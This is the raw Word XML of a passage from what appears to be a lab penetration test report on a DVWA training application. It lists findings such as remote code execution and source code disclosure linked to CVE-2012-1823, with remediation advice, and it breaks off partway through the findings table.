        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc224128482"/>
      <w:r w:rsidRPr="003333D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50-word web test summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="7A97F6D6" w14:textId="6156F193" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:t>A web security test on the DVWA application at 192.168.1.27 identified several vulnerabilities. Critical findings include Remote Code Execution and Source Code Disclosure linked to CVE-2012-1823. Additional issues include missing CSRF protection, absent clickjacking headers, insecure cookie configuration, and information leakage, which could allow attackers to exploit the web application if not remediated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F5E24" w14:textId="77777777" w:rsidR="00985C64" w:rsidRDefault="00985C64" w:rsidP="00985C64"/>
    <w:p w14:paraId="66791053" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="7FD2D4DB" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="776E452C" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="01B21A80" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="6652B0BB" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="3E1923AB" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="1D1F4EBF" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="4A21D9F4" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="6AF8DEF5" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="34C937F9" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="75615A95" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="63712640" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="3E24440E" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="7171A3B6" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="04EE444D" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="0D5BD04F" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="0DF1D895" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="5219C548" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="6C4350D5" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="06CD85A3" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="4928D701" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="51A8139F" w14:textId="77777777" w:rsidR="00FC7247" w:rsidRDefault="00FC7247" w:rsidP="00985C64"/>
    <w:p w14:paraId="48483372" w14:textId="4CF0FAB1" w:rsidR="00FC7247" w:rsidRDefault="00F12DCC" w:rsidP="00F12DCC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc224128483"/>
      <w:r w:rsidRPr="00F12DCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DVWA Web Application Vulnerability Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="462A6BDC" w14:textId="77777777" w:rsidR="000B0E5F" w:rsidRPr="000B0E5F" w:rsidRDefault="000B0E5F" w:rsidP="000B0E5F">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0E5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="000B0E5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B0E5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>This security assessment was conducted to identify vulnerabilities in the target system and evaluate potential security risks. Various testing techniques such as vulnerability scanning and simulated penetration testing were used to discover weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478B6D4" w14:textId="77777777" w:rsidR="000B0E5F" w:rsidRPr="000B0E5F" w:rsidRDefault="000B0E5F" w:rsidP="000B0E5F">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0E5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>The assessment identified critical vulnerabilities including Remote Code Execution and Source Code Disclosure, which could allow attackers to gain unauthorized access to the system. These vulnerabilities pose a risk to data confidentiality, integrity, and availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AD00A" w14:textId="77777777" w:rsidR="000B0E5F" w:rsidRPr="000B0E5F" w:rsidRDefault="000B0E5F" w:rsidP="000B0E5F">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0E5F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:kern w:val="2"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:t>Immediate remediation is recommended, including regularly monitoring system activity. Addressing these issues will significantly reduce the likelihood of successful cyber-attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F87D2" w14:textId="77777777" w:rsidR="00F12DCC" w:rsidRDefault="00F12DCC" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="6871426B" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="20C3EB1A" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="1B111F49" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="7E9F64A5" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="43E10442" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="3C1F7973" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="22D990FB" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="619757BE" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="64BAABC9" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="576EB8D3" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="41171559" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="28F2642A" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="7C827E74" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="10562A4F" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="5F843C1C" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="5F9AE96B" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="05D20C08" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="188C35D8" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="020A4009" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="6F105BCD" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="226AB4AA" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="3E137C87" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="7FE433B9" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="745657B8" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="79D20013" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="782766EE" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="3D8C353A" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="026B4137" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="1E9C73BF" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="72D7BC6B" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="788B125F" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:p w14:paraId="3D08DC78" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRDefault="008F6ABD" w:rsidP="00F12DCC"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2231"/>
        <w:gridCol w:w="2273"/>
        <w:gridCol w:w="2232"/>
        <w:gridCol w:w="2283"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="1F6061A3" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1165A262" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Finding ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031353DC" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1784D2A0" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Score </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D910457" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="01942CD3" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F8E707F" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267EA084" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remote Code Execution - CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E09C67" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DDCFAF3" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade to the latest stable version of PHP, or use the Apache web server and the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mod_rewrite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> module to filter out malicious requests using the "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RewriteCond</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>" and "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RewriteRule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>" directives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="0A583CA7" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C884763" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0327654E" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Source Code Disclosure - CVE-2012-1823</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19661321" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BF89425" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade to the latest stable version of PHP, or use the Apache web server and the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mod_rewrite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> module to filter out malicious requests using the "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RewriteCond</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>" and "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RewriteRule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>" directives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w14:paraId="015ADB72" w14:textId="77777777" w:rsidTr="003704DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="761B8F6F" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>F003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2337" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A5A7B14" w14:textId="77777777" w:rsidR="008F6ABD" w:rsidRPr="00DF15ED" w:rsidRDefault="008F6ABD" w:rsidP="003704DF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF15ED">
              <w:rPr>
